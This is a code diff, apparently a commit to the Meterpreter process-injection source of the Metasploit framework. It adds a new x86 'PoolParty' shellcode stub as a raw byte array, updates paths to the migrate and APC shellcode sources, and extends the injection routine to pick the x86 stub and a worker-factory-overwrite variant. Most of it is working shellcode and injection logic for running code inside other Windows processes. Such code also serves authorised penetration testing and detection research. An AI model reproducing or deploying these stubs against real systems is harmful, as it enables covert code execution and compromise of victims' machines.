55#include "../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
66#include <tlhelp32.h>
77
8- // see '/msf3 /external/source/shellcode/x86/migrate/executex64.asm'
8+ // see '/msf /external/source/shellcode/windows/ x86/src /migrate/executex64.asm'
99// 03.06.2017: fixed an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
1010// found and fixed by ReWolf, incorporated by RaMMicHaeL
1111BYTE migrate_executex64 [] = {0x55 ,0x89 ,0xE5 ,0x56 ,0x57 ,0x8B ,0x75 ,0x08 ,0x8B ,0x4D ,0x0C ,0xE8 ,0x00 ,0x00 ,0x00 ,0x00
@@ -15,7 +15,7 @@ BYTE migrate_executex64[] = {0x55,0x89,0xE5,0x56,0x57,0x8B,0x75,0x08,0x8B,0x4D,0
1515 ,0xD6 ,0x5F ,0x50 ,0xC7 ,0x44 ,0x24 ,0x04 ,0x23 ,0x00 ,0x00 ,0x00 ,0x89 ,0x3C ,0x24 ,0xFF ,0x2C
1616 ,0x24 };
1717
18- // see '/msf3 /external/source/shellcode/x64/migrate/remotethread.asm'
18+ // see '/msf /external/source/shellcode/windows/ x64/src /migrate/remotethread.asm'
1919BYTE migrate_wownativex [] = {0xFC ,0x48 ,0x89 ,0xCE ,0x48 ,0x89 ,0xE7 ,0x48 ,0x83 ,0xE4 ,0xF0 ,0xE8 ,0xC8 ,0x00 ,0x00 ,0x00
2020 ,0x41 ,0x51 ,0x41 ,0x50 ,0x52 ,0x51 ,0x56 ,0x48 ,0x31 ,0xD2 ,0x65 ,0x48 ,0x8B ,0x52 ,0x60 ,0x48
2121 ,0x8B ,0x52 ,0x18 ,0x48 ,0x8B ,0x52 ,0x20 ,0x48 ,0x8B ,0x72 ,0x50 ,0x48 ,0x0F ,0xB7 ,0x4A ,0x4A
@@ -36,7 +36,7 @@ BYTE migrate_wownativex[] = {0xFC,0x48,0x89,0xCE,0x48,0x89,0xE7,0x48,0x83,0xE4,0
3636 ,0x00 ,0x00 ,0x00 ,0x00 ,0xEB ,0x0A ,0x48 ,0xB8 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
3737 ,0x48 ,0x83 ,0xC4 ,0x50 ,0x48 ,0x89 ,0xFC ,0xC3 };
3838
39- // see '/msf3 /external/source/shellcode/x86/migrate/apc.asm'
39+ // see '/msf /external/source/shellcode/windows/ x86/src /migrate/apc.asm'
4040BYTE apc_stub_x86 [] = {0xFC ,0x8B ,0x74 ,0x24 ,0x04 ,0x55 ,0x89 ,0xE5 ,0xE8 ,0x89 ,0x00 ,0x00 ,0x00 ,0x60 ,0x89 ,0xE5
4141 ,0x31 ,0xD2 ,0x64 ,0x8B ,0x52 ,0x30 ,0x8B ,0x52 ,0x0C ,0x8B ,0x52 ,0x14 ,0x8B ,0x72 ,0x28 ,0x0F
4242 ,0xB7 ,0x4A ,0x26 ,0x31 ,0xFF ,0x31 ,0xC0 ,0xAC ,0x3C ,0x61 ,0x7C ,0x02 ,0x2C ,0x20 ,0xC1 ,0xCF
@@ -54,7 +54,7 @@ BYTE apc_stub_x86[] = {0xFC,0x8B,0x74,0x24,0x04,0x55,0x89,0xE5,0xE8,0x89,0x00,0
5454 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
5555 ,0x00 ,0x00 ,0x00 ,0x00 };
5656
57- // see '/msf3 /external/source/shellcode/x64/migrate/apc.asm'
57+ // see '/msf /external/source/shellcode/windows/ x64/src /migrate/apc.asm'
5858BYTE apc_stub_x64 [] = {0xFC ,0x80 ,0x79 ,0x10 ,0x00 ,0x0F ,0x85 ,0x13 ,0x01 ,0x00 ,0x00 ,0xC6 ,0x41 ,0x10 ,0x01 ,0x48
5959 ,0x83 ,0xEC ,0x78 ,0xE8 ,0xC8 ,0x00 ,0x00 ,0x00 ,0x41 ,0x51 ,0x41 ,0x50 ,0x52 ,0x51 ,0x56 ,0x48
6060 ,0x31 ,0xD2 ,0x65 ,0x48 ,0x8B ,0x52 ,0x60 ,0x48 ,0x8B ,0x52 ,0x18 ,0x48 ,0x8B ,0x52 ,0x20 ,0x48
@@ -77,7 +77,7 @@ BYTE apc_stub_x64[] = {0xFC,0x80,0x79,0x10,0x00,0x0F,0x85,0x13,0x01,0x00,0x00,0
7777 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00
7878 ,0x00 ,0x00 ,0x00 };
7979
80- // see '/msf3 /external/source/shellcode/x64/migrate/poolparty.asm'
80+ // see '/msf /external/source/shellcode/windows/ x64/src /migrate/poolparty.asm'
8181BYTE poolparty_stub_x64 [] = {0xFC ,0x55 ,0x57 ,0x56 ,0x48 ,0x89 ,0xE7 ,0xE9 ,0x01 ,0x01 ,0x00 ,0x00 ,0x5E ,0x48 ,0x83 ,0xEC
8282 ,0x78 ,0xE8 ,0xC8 ,0x00 ,0x00 ,0x00 ,0x41 ,0x51 ,0x41 ,0x50 ,0x52 ,0x51 ,0x56 ,0x48 ,0x31 ,0xD2
8383 ,0x65 ,0x48 ,0x8B ,0x52 ,0x60 ,0x48 ,0x8B ,0x52 ,0x18 ,0x48 ,0x8B ,0x52 ,0x20 ,0x48 ,0x8B ,0x72
@@ -97,6 +97,21 @@ BYTE poolparty_stub_x64[] = {0xFC,0x55,0x57,0x56,0x48,0x89,0xE7,0xE9,0x01,0x01,0
9797 ,0x38 ,0x68 ,0x0D ,0x16 ,0xFF ,0xD5 ,0x48 ,0x89 ,0xFC ,0x5E ,0x5F ,0x5D ,0xC3 ,0xE8 ,0xFA ,0xFE
9898 ,0xFF ,0xFF };
9999
100+ // see '/msf/external/source/shellcode/windows/x86/src/migrate/poolparty.asm'
101+ BYTE poolparty_stub_x86 [] = {0x55 ,0x53 ,0x57 ,0x56 ,0x89 ,0xe6 ,0xfc ,0xe9 ,0xbd ,0x00 ,0x00 ,0x00 ,0x5d ,0x6a ,0xff ,0xff
102+ ,0x73 ,0x10 ,0x68 ,0x08 ,0x87 ,0x1d ,0x60 ,0xff ,0xd5 ,0x31 ,0xff ,0x57 ,0x57 ,0xff ,0x73 ,0x08
103+ ,0xff ,0x33 ,0x57 ,0x57 ,0x68 ,0x38 ,0x68 ,0x0d ,0x16 ,0xff ,0xd5 ,0x89 ,0xf4 ,0x5e ,0x5f ,0x5b
104+ ,0x5d ,0xc3 ,0xe8 ,0xd5 ,0xff ,0xff ,0xff ,0x60 ,0x89 ,0xe5 ,0x31 ,0xd2 ,0x64 ,0x8b ,0x52 ,0x30
105+ ,0x8b ,0x52 ,0x0c ,0x8b ,0x52 ,0x14 ,0x8b ,0x72 ,0x28 ,0x0f ,0xb7 ,0x4a ,0x26 ,0x31 ,0xff ,0x31
106+ ,0xc0 ,0xac ,0x3c ,0x61 ,0x7c ,0x02 ,0x2c ,0x20 ,0xc1 ,0xcf ,0x0d ,0x01 ,0xc7 ,0x49 ,0x75 ,0xef
107+ ,0x52 ,0x57 ,0x8b ,0x52 ,0x10 ,0x8b ,0x42 ,0x3c ,0x01 ,0xd0 ,0x8b ,0x40 ,0x78 ,0x85 ,0xc0 ,0x74
108+ ,0x4c ,0x01 ,0xd0 ,0x50 ,0x8b ,0x48 ,0x18 ,0x8b ,0x58 ,0x20 ,0x01 ,0xd3 ,0x85 ,0xc9 ,0x74 ,0x3c
109+ ,0x49 ,0x8b ,0x34 ,0x8b ,0x01 ,0xd6 ,0x31 ,0xff ,0x31 ,0xc0 ,0xac ,0xc1 ,0xcf ,0x0d ,0x01 ,0xc7
110+ ,0x38 ,0xe0 ,0x75 ,0xf4 ,0x03 ,0x7d ,0xf8 ,0x3b ,0x7d ,0x24 ,0x75 ,0xe0 ,0x58 ,0x8b ,0x58 ,0x24
111+ ,0x01 ,0xd3 ,0x66 ,0x8b ,0x0c ,0x4b ,0x8b ,0x58 ,0x1c ,0x01 ,0xd3 ,0x8b ,0x04 ,0x8b ,0x01 ,0xd0
112+ ,0x89 ,0x44 ,0x24 ,0x24 ,0x5b ,0x5b ,0x61 ,0x59 ,0x5a ,0x51 ,0xff ,0xe0 ,0x58 ,0x5f ,0x5a ,0x8b
113+ ,0x12 ,0xeb ,0x83 ,0x5b ,0xe8 ,0x69 ,0xff ,0xff ,0xff ,0xe8 ,0xf5 ,0xff ,0xff ,0xff };
114+
100115/*
101116 * Attempt to gain code execution in the remote process via a call to ntdll!NtQueueApcThread
102117 * Note: Windows Server 2008R2 can blue screen if you use APC injection to inject into another sessions csrss.exe
@@ -526,12 +541,21 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
526541
527542 do
528543 {
529-
544+ if (poolparty == NULL )
545+ {
546+ BREAK_WITH_ERROR ("[INJECT][inject_via_poolparty] The pool party could not be initialized" , ERROR_INVALID_FUNCTION );
547+ }
548+
530549 if (dwDestinationArch == PROCESS_ARCH_X64 && (dwMeterpreterArch == PROCESS_ARCH_X64 || dwMeterpreterArch == PROCESS_ARCH_X86 )) {
531550 dprintf ("[INJECT][inject_via_poolparty] using: poolparty_stub_x64" );
532551 lpStub = & poolparty_stub_x64 ;
533552 dwStubSize = sizeof (poolparty_stub_x64 );
534553 }
554+ else if (dwDestinationArch == PROCESS_ARCH_X86 && dwMeterpreterArch == PROCESS_ARCH_X86 ) {
555+ dprintf ("[INJECT][inject_via_poolparty] using: poolparty_stub_x86" );
556+ lpStub = & poolparty_stub_x86 ;
557+ dwStubSize = sizeof (poolparty_stub_x86 );
558+ }
535559 else {
536560 BREAK_WITH_ERROR ("[INJECT][inject_via_poolparty] Can't inject on this target (yet)!" , ERROR_INVALID_FUNCTION );
537561 }
@@ -567,6 +591,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
567591#ifdef DEBUGTRACE
568592 char * VARIANT_POS_TO_STR [POOLPARTY_TECHNIQUE_COUNT ] = {
569593 "POOLPARTY_TECHNIQUE_TP_DIRECT_INSERTION" ,
594+ "POOLPARTY_TECHNIQUE_WORKER_FACTORY_OVERWRITE" ,
570595 };
571596 dprintf ("[INJECT][inject_via_poolparty] Attempting injection with variant %s" , VARIANT_POS_TO_STR [variant ]);
572597#endif
@@ -715,4 +740,4 @@ DWORD inject_dll(DWORD dwPid, DWORD dwDestinationArch, LPVOID lpDllBuffer, DWORD
715740 CloseHandle (hProcess );
716741
717742 return dwResult ;
718- }
743+ }
0 commit comments